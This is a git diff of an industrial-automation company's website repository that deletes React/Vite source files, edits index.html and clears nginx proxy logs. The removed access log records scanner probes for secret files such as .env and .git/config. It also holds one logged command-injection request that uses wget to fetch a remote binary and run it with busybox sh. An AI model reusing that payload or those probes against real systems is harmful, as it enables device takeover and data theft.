- ); -}; - -export default Hero; diff --git a/html/components/Services.tsx b/html/components/Services.tsx deleted file mode 100644 index 485fe48..0000000 --- a/html/components/Services.tsx +++ /dev/null @@ -1,78 +0,0 @@ - -import React from 'react'; -import { ServiceItem } from '../types'; - -const SERVICES: ServiceItem[] = [ - { - id: 'dcs', - title: 'Distributed Control (DCS)', - description: 'Advanced, redundant control architectures designed for continuous process industries including power generation and chemicals.', - icon: 'fa-network-wired', - image: 'https://images.unsplash.com/photo-1518770660439-4636190af475?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'scada', - title: 'SCADA Solutions', - description: 'High-performance monitoring platforms with cutting-edge HMI, real-time analytics, and secure remote access protocols.', - icon: 'fa-chart-line', - image: 'https://images.unsplash.com/photo-1551288049-bebda4e38f71?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'database', - title: 'Industrial Historians', - description: 'Mission-critical database servers and SQL infrastructure optimized for heavy manufacturing data and regulatory compliance.', - icon: 'fa-database', - image: 'https://images.unsplash.com/photo-1558494949-ef010cbdcc48?auto=format&fit=crop&q=80&w=800' - }, - { - id: 'instruments', - title: 'Control Instruments', - description: 'Precision field instruments including flow, pressure, and temperature transmitters and smart control valves.', - icon: 'fa-gauge-high', - image: 'https://images.unsplash.com/photo-1531482615713-2afd69097998?auto=format&fit=crop&q=80&w=800' - } -]; - -const Services: React.FC = () => { - return ( -
-
-
-

Capabilities

-

World-Class Automation

-

- We bridge the gap between heavy physical operations and digital intelligence through robust networking and control systems. -

-
- -
- {SERVICES.map((service) => ( -
-
- {service.title} -
-
-
- -
-

{service.title}

-

- {service.description} -

- - Technical Specs - -
-
- ))} -
-
-
- ); -}; - -export default Services; diff --git a/html/index.html b/html/index.html index ea65b2f..e5e5a8c 100644 --- a/html/index.html +++ b/html/index.html @@ -129,45 +129,92 @@
- -
-
-

Advanced Control Systems

-

DCS Integration

-

Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications.

+
+

+ Advanced Control Systems +

+

+ DCS Integration +

+

+ Enterprise-grade Distributed Control System architecture designed for the most critical industrial applications. +

+
-
DCS Control Room
+ +
+ DCS Control Room +
+
-
- + +
Honeywell Logo +

+ Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance +

+
+ + +
-

Reliable DCS solutions with Honeywell's Experion PKS, ensuring seamless integration and optimal performance

-
-
-
-

Redundant Architecture

Fault-tolerant systems with dual processing units ensuring 99.99% uptime

-
-
-
-

Real-time Communication

Sub-millisecond response times with synchronized control across multiple nodes

+
+
+ +
+
+
+

Redundant Architecture

+

+ Fault-tolerant systems with dual processing units ensuring 99.99% uptime +

+
+
-
-

Security Certified

IEC 62443 compliance with military-grade encryption protocols

+
+
+ +
+
+
+

Real-time Communication

+

+ Sub-millisecond response times with synchronized control across multiple nodes +

+
+
+ +
+
+
+ +
+
+
+

Security Certified

+

+ IEC 62443 compliance with military-grade encryption protocols +

+
- + + +
- -
+

Process Automation

@@ -203,8 +250,7 @@
Batch Process
-
- +
@@ -301,7 +347,7 @@
-
+

Shutoff Valves

Accelerometers and velocity sensors for predictive maintenance

Automa
Proval
Flowserve
@@ -491,16 +537,16 @@
About Hanmo
-
+
20+
Years of Industrial Excellence
-
+

About Hanmo

Trusted Partner in Industrial Automation

Since our founding, Hanmo Control & Network Co., Ltd. has been at the forefront of industrial automation engineering.

-

Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.

+

Our team of 60+ certified engineers brings decades of combined experience in DCS, SCADA, and industrial networking.

ISO 9001
diff --git a/html/index.tsx b/html/index.tsx deleted file mode 100644 index aaa0c6e..0000000 --- a/html/index.tsx +++ /dev/null @@ -1,16 +0,0 @@ - -import React from 'react'; -import ReactDOM from 'react-dom/client'; -import App from './App'; - -const rootElement = document.getElementById('root'); -if (!rootElement) { - throw new Error("Could not find root element to mount to"); -} - -const root = ReactDOM.createRoot(rootElement); -root.render( - - - -); diff --git a/html/metadata.json b/html/metadata.json deleted file mode 100644 index 521d72a..0000000 --- a/html/metadata.json +++ /dev/null @@ -1,7 +0,0 @@ -{ - "name": "Hanmo Control & Network Co., Ltd.", - "description": "Premium industrial automation solutions provider specializing in DCS, SCADA, Database Servers, and Control Instruments.", - "requestFramePermissions": [ - "camera" - ] -} \ No newline at end of file diff --git a/html/package.json b/html/package.json deleted file mode 100644 index 53a194c..0000000 --- a/html/package.json +++ /dev/null @@ -1,23 +0,0 @@ -{ - "name": "hanmo-control-&-network-co.,-ltd.", - "private": true, - "version": "0.0.0", - "type": "module", - "scripts": { - "dev": "vite", - "build": "vite build", - "preview": "vite preview" - }, - "dependencies": { - "react": "^19.2.4", - "react-dom": "^19.2.4", - "@google/genai": "^1.41.0", - "react-router-dom": "^7.13.0" - }, - "devDependencies": { - "@types/node": "^22.14.0", - "@vitejs/plugin-react": "^5.0.0", - "typescript": "~5.8.2", - "vite": "^6.2.0" - } -} diff --git a/html/services/geminiService.ts b/html/services/geminiService.ts deleted file mode 100644 index 480d86b..0000000 --- a/html/services/geminiService.ts +++ /dev/null @@ -1,36 +0,0 @@ - -import { GoogleGenAI } from "@google/genai"; - -const SYSTEM_INSTRUCTION = `You are the primary AI Technical Consultant for "Hanmo Control & Network Co., Ltd.". -Hanmo is a global leader specializing in: -1. DCS (Distributed Control Systems): High-availability process automation for utility-scale industries. -2. SCADA (Supervisory Control and Data Acquisition): Real-time remote operations and monitoring. -3. Database & Historian Servers: Secure, high-speed industrial data management. -4. Precision Control Instruments: Smart sensors and actuators for flow, pressure, and thermal management. - -Tone: Professional, highly technical, authoritative, and helpful. -Language: You must respond in English at all times. -Guidance: Provide expert advice on automation architecture and integration. For pricing or project-specific quotes, instruct the user to use the official contact form on the website.`; - -export async function chatWithExpert(message: string, history: {role: 'user' | 'model', text: string}[]) { - try { - const ai = new GoogleGenAI({ apiKey: process.env.API_KEY || '' }); - - const response = await ai.models.generateContent({ - model: 'gemini-3-flash-preview', - contents: [ - ...history.map(h => ({ role: h.role === 'user' ? 'user' : 'model', parts: [{ text: h.text }] })), - { role: 'user', parts: [{ text: message }] } - ], - config: { - systemInstruction: SYSTEM_INSTRUCTION, - temperature: 0.7, - }, - }); - - return response.text || "I apologize, but I am unable to process your technical inquiry right now. Please try again later."; - } catch (error) { - console.error("Gemini API Error:", error); - return "Our technical advisor is currently offline. Please contact our support team directly via email."; - } -} diff --git a/html/status.json b/html/status.json index db24949..72ff7c2 100644 --- a/html/status.json +++ b/html/status.json @@ -1 +1 @@ -{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "07:51:01"} \ No newline at end of file +{"cpu_temp": "40", "nvme_temp": "33", "uptime_days": 6, "last_update": "13:19:01"} \ No newline at end of file diff --git a/html/tsconfig.json b/html/tsconfig.json deleted file mode 100644 index 2c6eed5..0000000 --- a/html/tsconfig.json +++ /dev/null @@ -1,29 +0,0 @@ -{ - "compilerOptions": { - "target": "ES2022", - "experimentalDecorators": true, - "useDefineForClassFields": false, - "module": "ESNext", - "lib": [ - "ES2022", - "DOM", - "DOM.Iterable" - ], - "skipLibCheck": true, - "types": [ - "node" - ], - "moduleResolution": "bundler", - "isolatedModules": true, - "moduleDetection": "force", - "allowJs": true, - "jsx": "react-jsx", - "paths": { - "@/*": [ - "./*" - ] - }, - "allowImportingTsExtensions": true, - "noEmit": true - } -} \ No newline at end of file diff --git a/html/types.ts b/html/types.ts deleted file mode 100644 index 3372801..0000000 --- a/html/types.ts +++ /dev/null @@ -1,20 +0,0 @@ - -export interface Message { - role: 'user' | 'model'; - text: string; -} - -export interface ServiceItem { - id: string; - title: string; - description: string; - icon: string; - image: string; -} - -export interface ContactFormData { - name: string; - email: string; - subject: string; - message: string; -} diff --git a/html/vite.config.ts b/html/vite.config.ts deleted file mode 100644 index ee5fb8d..0000000 --- a/html/vite.config.ts +++ /dev/null @@ -1,23 +0,0 @@ -import path from 'path'; -import { defineConfig, loadEnv } from 'vite'; -import react from '@vitejs/plugin-react'; - -export default defineConfig(({ mode }) => { - const env = loadEnv(mode, '.', ''); - return { - server: { - port: 3000, - host: '0.0.0.0', - }, - plugins: [react()], - define: { - 'process.env.API_KEY': JSON.stringify(env.GEMINI_API_KEY), - 'process.env.GEMINI_API_KEY': JSON.stringify(env.GEMINI_API_KEY) - }, - resolve: { - alias: { - '@': path.resolve(__dirname, '.'), - } - } - }; -}); diff --git a/npm/data/logs/fallback_error.log b/npm/data/logs/fallback_error.log index d2c3384..e69de29 100644 --- a/npm/data/logs/fallback_error.log +++ b/npm/data/logs/fallback_error.log @@ -1,10 +0,0 @@ -2026/02/15 06:35:42 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:37:39 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:38:59 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:40:00 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:40:49 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:41:59 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:42:45 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:43:05 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:43:28 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size -2026/02/15 06:44:14 [warn] 169#169: could not build optimal proxy_headers_hash, you should increase either proxy_headers_hash_max_size: 512 or proxy_headers_hash_bucket_size: 64; ignoring proxy_headers_hash_bucket_size diff --git a/npm/data/logs/fallback_http_access.log b/npm/data/logs/fallback_http_access.log index debb7a4..754f91f 100644 --- a/npm/data/logs/fallback_http_access.log +++ b/npm/data/logs/fallback_http_access.log @@ -1,1804 +1,51 @@ -[14/Feb/2026:21:47:47 +0000] 200 - GET http www.hanmocnn.co.kr "/" [Client 172.17.0.1] [Length 1033] [Gzip -] "curl/8.5.0" "-" -[14/Feb/2026:21:50:30 +0000] 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/159751378329916" [Client 222.117.41.51] [Length 150] [Gzip -] "curl/8.12.1" "-" -[14/Feb/2026:21:53:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.135.211.148] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[14/Feb/2026:22:32:24 +0000] 404 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/31481293126031" [Client 222.117.41.51] [Length 150] [Gzip -] "curl/8.12.1" "-" -[14/Feb/2026:22:41:34 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:22:53:37 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[14/Feb/2026:22:57:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:00:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.200.94] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:09:29 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[14/Feb/2026:23:16:43 +0000] 404 - GET http 222.117.41.51 "/.git/config" [Client 213.209.159.181] [Length 183] [Gzip 3.21] "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" -[14/Feb/2026:23:18:08 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[14/Feb/2026:23:26:45 +0000] 404 - POST http 222.117.41.51 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.151%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc" [Client 130.12.180.151] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" -[14/Feb/2026:23:33:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:33:45 +0000] 400 - - http localhost "-" [Client 142.93.0.66] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:33:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:33:45 +0000] 400 - - http localhost "-" [Client 142.93.0.66] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:33:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.213.72] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:33:46 +0000] 400 - GET http mail.hanmocnn.co.kr "/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:47 +0000] 400 - GET http mail.hanmocnn.co.kr "/server" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:48 +0000] 400 - GET http mail.hanmocnn.co.kr "/server-status" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:50 +0000] 400 - GET http mail.hanmocnn.co.kr "/about" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:51 +0000] 400 - GET http mail.hanmocnn.co.kr "/login.action" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:52 +0000] 400 - GET http mail.hanmocnn.co.kr "/v2/_catalog" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:52 +0000] 400 - GET http mail.hanmocnn.co.kr "/.DS_Store" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:53 +0000] 400 - GET http mail.hanmocnn.co.kr "/.env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:55 +0000] 400 - GET http mail.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:57 +0000] 400 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:58 +0000] 400 - POST http mail.hanmocnn.co.kr "/graphql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:59 +0000] 400 - POST http mail.hanmocnn.co.kr "/api" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:33:59 +0000] 400 - POST http mail.hanmocnn.co.kr "/api/graphql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:00 +0000] 400 - POST http mail.hanmocnn.co.kr "/graphql/api" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:00 +0000] 400 - POST http mail.hanmocnn.co.kr "/api/gql" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:00 +0000] 400 - GET http mail.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:01 +0000] 400 - GET http mail.hanmocnn.co.kr "/config.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:03 +0000] 400 - GET http mail.hanmocnn.co.kr "/telescope/requests" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:04 +0000] 400 - GET http mail.hanmocnn.co.kr "/info.php" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:05 +0000] 400 - GET http mail.hanmocnn.co.kr "/.well-known/security.txt" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:06 +0000] 400 - GET http mail.hanmocnn.co.kr "/actuator/env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:08 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger-ui.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:09 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/index.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:10 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:11 +0000] 400 - GET http mail.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:12 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:13 +0000] 400 - GET http mail.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:14 +0000] 400 - GET http mail.hanmocnn.co.kr "/v2/api-docs" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:15 +0000] 400 - GET http mail.hanmocnn.co.kr "/v3/api-docs" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:16 +0000] 400 - GET http mail.hanmocnn.co.kr "/api-docs/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:17 +0000] 400 - GET http mail.hanmocnn.co.kr "/api/swagger.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:18 +0000] 400 - GET http mail.hanmocnn.co.kr "/@vite/env" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:19 +0000] 400 - GET http mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:20 +0000] 400 - OPTIONS http mail.hanmocnn.co.kr "/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:21 +0000] 400 - GET http mail.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:34:22 +0000] 400 - GET http mail.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 142.93.0.66] [Length 252] [Gzip -] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-" -[14/Feb/2026:23:37:17 +0000] 404 - GET http 222.117.41.51 "/login.asp" [Client 195.3.221.86] [Length 150] [Gzip -] "-" "-" -[14/Feb/2026:23:40:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[14/Feb/2026:23:47:02 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[14/Feb/2026:23:54:55 +0000] 400 - GET http 222.117.41.51 "/" [Client 106.117.108.193] [Length 252] [Gzip -] "-" "-" -[14/Feb/2026:23:55:08 +0000] 400 - - http localhost "-" [Client 182.138.158.204] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:55:21 +0000] 400 - GET http 222.117.41.51 "/" [Client 118.212.122.192] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[14/Feb/2026:23:55:35 +0000] 400 - GET http 222.117.41.51 "/" [Client 175.19.74.90] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[14/Feb/2026:23:56:03 +0000] 400 - GET http 222.117.41.51 "/" [Client 123.191.128.215] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" -[14/Feb/2026:23:59:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:59:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-" -[14/Feb/2026:23:59:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.22.1.1] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:00:03:27 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:00:04:22 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:00:04:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 222.117.41.51] [Length 154] [Gzip -] "-" "-" -[15/Feb/2026:00:05:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 178.16.54.17] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:00:08:19 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36" "-" -[15/Feb/2026:00:12:19 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:00:18:28 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:00:34:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:00:40:35 +0000] 200 - GET http 222.117.41.51 "/" [Client 195.3.221.86] [Length 568] [Gzip 1.86] "-" "-" -[15/Feb/2026:00:59:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:01:03:23 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:01:12:44 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[15/Feb/2026:01:19:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:01:27:57 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[15/Feb/2026:01:37:47 +0000] 400 - GET http 222.117.41.51 "/page/style/index.css" 